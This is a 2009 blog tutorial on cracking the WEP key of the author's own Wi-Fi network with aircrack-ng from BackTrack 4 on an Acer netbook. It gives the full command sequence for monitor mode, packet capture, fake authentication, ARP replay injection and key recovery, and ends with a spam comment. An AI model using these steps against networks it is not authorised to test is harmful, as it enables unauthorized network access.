« Androidメモ(remount command) | メイン
2009年12月13日
Aircrack-ng on the Acer Aspire One (AOA-150)
Lately I've been fooling around with aircrack-ng to test out my own network and it's been a real eye-opener for me on how weak WEP is after I was able to crack my 128 bit password in about 5 minutes on a rather underpowered netbook (and this includes the time it takes to boot up the PC). Here's a short tutorial on how it's done, and I recommend anybody who is interested to give it a try!
Apparently there is a pretty solid self-contained distro of aircrack tailored for the AOA, which can be found here:
Slitaz Aircrack-ng Distribution
But unfortunately this one didn't work for me because I swapped out the included Atheros wireless in favor of a Dell 1390 card with a Broadcom chipset. I know the Atheros is better for performance and especially for poking around for security testing, but to get my Hackintosh running reliably I needed to perform the swap.
Since I'm probably not the only person in the world who has done this (if the aspireoneuser.com OSX forums are any indication), I had to look around and find an alternative way, which turned out to be not that bad. I'm certainly no Linux guru, but this is as much for myself as it is for others, and these simple steps worked for me with *my* setup, and if it can also benefit others in my situation then that's great.
1. Download BackTrack 4 Pre from its website
2. Either burn it to DVD and boot it from an external drive, or get a suitable USB stick and use UNetbootin to make a bootable stick.
3. A boot menu will pop up, and on my screen it was almost impossible to tell which menu option I had highlighted; once you get the screen just press Down once (it will be on the 800x600 option) and hit Enter
4. Once the console is up, type "startx" and hit Enter
5. X will boot, and open up a console from here (it's a little black box icon in the lower left corner)
6. Type "airmon-ng start wlan0" to set the card in monitor mode
7. Next type "airodump-ng wlan0" and a list of APs detected will present itself, find yours and note its channel (CH). Make sure it's using WEP too!
8. Now to set the channel, type "airodump-ng -c channel wlan0" where channel is a the channel of your AP from earlier
9. Leave this running and open up a new console window
10. Type "airodump-ng -c channel --bssid macaddr -w dump wlan0" where channel is your channel and macaddr is the mac address of your AP, which can be copied over from the first window you left running
11. Leave this running too, and open up another console
12. Type "aireplay-ng --fakeauth 0 -e essid wlan0" where essid is the name of your AP. It should spit some stuff and say Authentication Successful :-)
13. Check the previous window and you should see some connected clients, notably your own PC, note your own mac address if you don't know it off hand
14. Now type "aireplay-ng --arpreplay -b macaddr -h yourmac wlan0" where macaddr is the AP mac address and yourmac is the mac address of your wireless card from the previous step
15. Give it a few moments and the window should start scrolling like mad
16. Open up a new console again, and now type "aircrack-ng -b macaddr dump*.cap" where macaddr is the AP mac. It will print out a nice little table and start crunching numbers.
17. Give it some time, but if you have enough data collected it should take no more than a few seconds to get the key. Note the number of "IVs" it has collected. We are looking for something in the range of 50,000 IVs to make getting the passkey viable. If you have less than that, then just hit ctrl+c and exit, wait a few more minutes and try again. I've personally seen as little as 10k IVs and still been able to get the passkey, and other times had more than 100k and got nothing. In the end it's just a bit of old-fashioned trial-and-error, if it keeps going and going just quit and give it some time, then give it another shot. Eventually you'll have enough data to analyze and pop! Out comes the WEP key (in hex).
I hope this helped and most of all have fun!
投稿者 error : 2009年12月13日 04:44
トラックバック
このエントリーのトラックバックURL:
http://www.iamerror.com/mt/mt-tb.cgi/109
コメント
That is great that we can get the mortgage loans and this opens up new possibilities.
投稿者 DarcyOLIVER : 2010年06月02日 03:22